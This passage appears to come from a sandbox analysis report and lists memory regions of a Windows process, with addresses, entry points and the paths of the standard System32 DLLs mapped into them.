mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1849 start_va = 0x7ffb0e4c0000 end_va = 0x7ffb0e4f1fff monitored = 0 entry_point = 0x7ffb0e4cb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1850 start_va = 0x7ffb0f110000 end_va = 0x7ffb0f176fff monitored = 0 entry_point = 0x7ffb0f11b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1851 start_va = 0x7ffb0f250000 end_va = 0x7ffb0f36cfff monitored = 0 entry_point = 0x7ffb0f27fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1852 start_va = 0x7ffb10ae0000 end_va = 0x7ffb10b15fff monitored = 0 entry_point = 0x7ffb10ae27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1853 start_va = 0x7ffb10e10000 end_va = 0x7ffb10e20fff monitored = 0 entry_point = 0x7ffb10e17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1854 start_va = 0x7ffb10e30000 end_va = 0x7ffb10eb3fff monitored = 0 entry_point = 0x7ffb10e48d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1855 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1856 start_va = 0x7ffb10f60000 end_va = 0x7ffb11035fff monitored = 0 entry_point = 0x7ffb10f8a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1857 start_va = 0x7ffb11040000 end_va = 0x7ffb110a3fff monitored = 0 entry_point = 0x7ffb1105bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1858 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1859 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1860 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1861 start_va = 0x7ffb11200000 end_va = 0x7ffb11273fff monitored = 0 entry_point = 0x7ffb11215eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1862 start_va = 0x7ffb11280000 end_va = 0x7ffb113b6fff monitored = 0 entry_point = 0x7ffb112c0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1863 start_va = 0x7ffb11470000 end_va = 0x7ffb11485fff monitored = 0 entry_point = 0x7ffb11471af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1864 start_va = 0x7ffb11490000 end_va = 0x7ffb114a9fff monitored = 0 entry_point = 0x7ffb11492330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1865 start_va = 0x7ffb114b0000 end_va = 0x7ffb114bcfff monitored = 0 entry_point = 0x7ffb114b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1866 start_va = 0x7ffb115e0000 end_va = 0x7ffb115eefff monitored = 0 entry_point = 0x7ffb115e4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1867 start_va = 0x7ffb11600000 end_va = 0x7ffb1160afff monitored = 0 entry_point = 0x7ffb11601de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1868 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1869 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1870 start_va = 0x7ffb116c0000 end_va = 0x7ffb11741fff monitored = 0 entry_point = 0x7ffb116c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1871 start_va = 0x7ffb12610000 end_va = 0x7ffb12651fff monitored = 0 entry_point = 0x7ffb12613670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1872 start_va = 0x7ffb12660000 end_va = 0x7ffb126a5fff monitored = 0 entry_point = 0x7ffb126679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1873 start_va = 0x7ffb126b0000 end_va = 0x7ffb126effff monitored = 0 entry_point = 0x7ffb126bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1874 start_va = 0x7ffb126f0000 end_va = 0x7ffb12736fff monitored = 0 entry_point = 0x7ffb126f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1875 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1876 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1877 start_va = 0x7ffb127f0000 end_va = 0x7ffb12807fff monitored = 0 entry_point = 0x7ffb127f4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1878 start_va = 0x7ffb12810000 end_va = 0x7ffb12834fff monitored = 0 entry_point = 0x7ffb12815ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1879 start_va = 0x7ffb12850000 end_va = 0x7ffb12890fff monitored = 0 entry_point = 0x7ffb12853750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1880 start_va = 0x7ffb128a0000 end_va = 0x7ffb12992fff monitored = 0 entry_point = 0x7ffb128c5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1881 start_va = 0x7ffb12a60000 end_va = 0x7ffb12a77fff monitored = 0 entry_point = 0x7ffb12a62000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1882 start_va = 0x7ffb12a80000 end_va = 0x7ffb12c01fff monitored = 0 entry_point = 0x7ffb12a982a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1883 start_va = 0x7ffb12c10000 end_va = 0x7ffb12cb2fff monitored = 0 entry_point = 0x7ffb12c12c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1884 start_va = 0x7ffb12cc0000 end_va = 0x7ffb12d11fff monitored = 0 entry_point = 0x7ffb12cc5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1885 start_va = 0x7ffb12d40000 end_va = 0x7ffb12d6dfff monitored = 1 entry_point = 0x7ffb12d42300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1886 start_va = 0x7ffb12d70000 end_va = 0x7ffb12dcdfff monitored = 0 entry_point = 0x7ffb12d75080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1887 start_va = 0x7ffb12dd0000 end_va = 0x7ffb12deffff monitored = 0 entry_point = 0x7ffb12dd1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1888 start_va = 0x7ffb12df0000 end_va = 0x7ffb12df8fff monitored = 0 entry_point = 0x7ffb12df18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1889 start_va = 0x7ffb12e00000 end_va = 0x7ffb12e10fff monitored = 0 entry_point = 0x7ffb12e01d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1890 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1891 start_va = 0x7ffb12fb0000 end_va = 0x7ffb12febfff monitored = 0 entry_point = 0x7ffb12fb6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1892 start_va = 0x7ffb13040000 end_va = 0x7ffb1308bfff monitored = 0 entry_point = 0x7ffb13055310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1893 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1894 start_va = 0x7ffb14500000 end_va = 0x7ffb14534fff monitored = 0 entry_point = 0x7ffb1450a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1895 start_va = 0x7ffb16be0000 end_va = 0x7ffb16beffff monitored = 0 entry_point = 0x7ffb16be1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1896 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1897 start_va = 0x7ffb18160000 end_va = 0x7ffb18172fff monitored = 0 entry_point = 0x7ffb18161b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1898 start_va = 0x7ffb18180000 end_va = 0x7ffb18201fff monitored = 0 entry_point = 0x7ffb18181790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 1899 start_va = 0x7ffb18210000 end_va = 0x7ffb18293fff monitored = 0 entry_point = 0x7ffb18222830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1900 start_va = 0x7ffb182a0000 end_va = 0x7ffb18304fff monitored = 0 entry_point = 0x7ffb182b3170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 1901 start_va = 0x7ffb18310000 end_va = 0x7ffb18608fff monitored = 0 entry_point = 0x7ffb183d7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1902 start_va = 0x7ffb18610000 end_va = 0x7ffb18845fff monitored = 0 entry_point = 0x7ffb1869a450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1903 start_va = 0x7ffb19500000 end_va = 0x7ffb19521fff monitored = 0 entry_point = 0x7ffb19512540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1904 start_va = 0x7ffb19530000 end_va = 0x7ffb19604fff monitored = 0 entry_point = 0x7ffb1954cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1905 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1906 start_va = 0x7ffb19750000 end_va = 0x7ffb19a89fff monitored = 0 entry_point = 0x7ffb19758520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1907 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1908 start_va = 0x7ffb1a350000 end_va = 0x7ffb1a358fff monitored = 0 entry_point = 0x7ffb1a3521d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1909 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1910 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1911 start_va = 0x7ffb1a5b0000 end_va = 0x7ffb1a5d7fff monitored = 0 entry_point = 0x7ffb1a5befc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1912 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1913 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1914 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1915 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1916 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1917 start_va = 0x7ffb1d1d0000 end_va = 0x7ffb1d1dffff monitored = 0 entry_point = 0x7ffb1d1d1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1918 start_va = 0x7ffb1d1e0000 end_va = 0x7ffb1d1e8fff monitored = 0 entry_point = 0x7ffb1d1e1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1919 start_va = 0x7ffb1d1f0000 end_va = 0x7ffb1d21cfff monitored = 0 entry_point = 0x7ffb1d1f2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1920 start_va = 0x7ffb1d220000 end_va = 0x7ffb1d271fff monitored = 0 entry_point = 0x7ffb1d2238e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1921 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1922 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1923 start_va = 0x7ffb1d8a0000 end_va = 0x7ffb1d8befff monitored = 0 entry_point = 0x7ffb1d8a4960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1924 start_va = 0x7ffb1d8c0000 end_va = 0x7ffb1d959fff monitored = 0 entry_point = 0x7ffb1d8dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1925 start_va = 0x7ffb1d960000 end_va = 0x7ffb1d974fff monitored = 0 entry_point = 0x7ffb1d963460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1926 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1927 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1928 start_va = 0x7ffb1dc60000 end_va = 0x7ffb1dd1ffff monitored = 0 entry_point = 0x7ffb1dc8fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1929 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1930 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1931 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1932 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1933 start_va = 0x7ffb1ddb0000 end_va = 0x7ffb1de95fff monitored = 0 entry_point = 0x7ffb1ddccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1934 start_va = 0x7ffb1dff0000 end_va = 0x7ffb1e01dfff monitored = 0 entry_point = 0x7ffb1dff7550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1935 start_va = 0x7ffb1e020000 end_va = 0x7ffb1e02cfff monitored = 0 entry_point = 0x7ffb1e022ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1936 start_va = 0x7ffb1e030000 end_va = 0x7ffb1e05efff monitored = 0 entry_point = 0x7ffb1e038910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1937 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1938 start_va = 0x7ffb1e130000 end_va = 0x7ffb1e13ffff monitored = 0 entry_point = 0x7ffb1e132c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1939 start_va = 0x7ffb1e140000 end_va = 0x7ffb1e153fff monitored = 0 entry_point = 0x7ffb1e142d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1940 start_va = 0x7ffb1e440000 end_va = 0x7ffb1e4d2fff monitored = 0 entry_point = 0x7ffb1e449680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1941 start_va = 0x7ffb1e560000 end_va = 0x7ffb1e577fff monitored = 0 entry_point = 0x7ffb1e561b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1942 start_va = 0x7ffb1e580000 end_va = 0x7ffb1e59cfff monitored = 0 entry_point = 0x7ffb1e584f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1943 start_va = 0x7ffb1e5a0000 end_va = 0x7ffb1e5b3fff monitored = 0 entry_point = 0x7ffb1e5a2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1944 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1945 start_va = 0x7ffb1e820000 end_va = 0x7ffb1e88dfff monitored = 0 entry_point = 0x7ffb1e827f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1946 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1947 start_va = 0x7ffb1e8b0000 end_va = 0x7ffb1e8f0fff monitored = 0 entry_point = 0x7ffb1e8c7eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1948 start_va = 0x7ffb1e900000 end_va = 0x7ffb1e9fbfff monitored = 0 entry_point = 0x7ffb1e936df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1949 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1950 start_va = 0x7ffb1eab0000 end_va = 0x7ffb1eac1fff monitored = 0 entry_point = 0x7ffb1eab9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1951 start_va = 0x7ffb1ead0000 end_va = 0x7ffb1eb80fff monitored = 0 entry_point = 0x7ffb1eb488b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1952 start_va = 0x7ffb1eb90000 end_va = 0x7ffb1ebb4fff monitored = 0 entry_point = 0x7ffb1eba2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1953 start_va = 0x7ffb1ebc0000 end_va = 0x7ffb1ebd0fff monitored = 0 entry_point = 0x7ffb1ebc7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1954 start_va = 0x7ffb1ebe0000 end_va = 0x7ffb1ebf9fff monitored = 0 entry_point = 0x7ffb1ebe2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1955 start_va = 0x7ffb1ec00000 end_va = 0x7ffb1ec0bfff monitored = 0 entry_point = 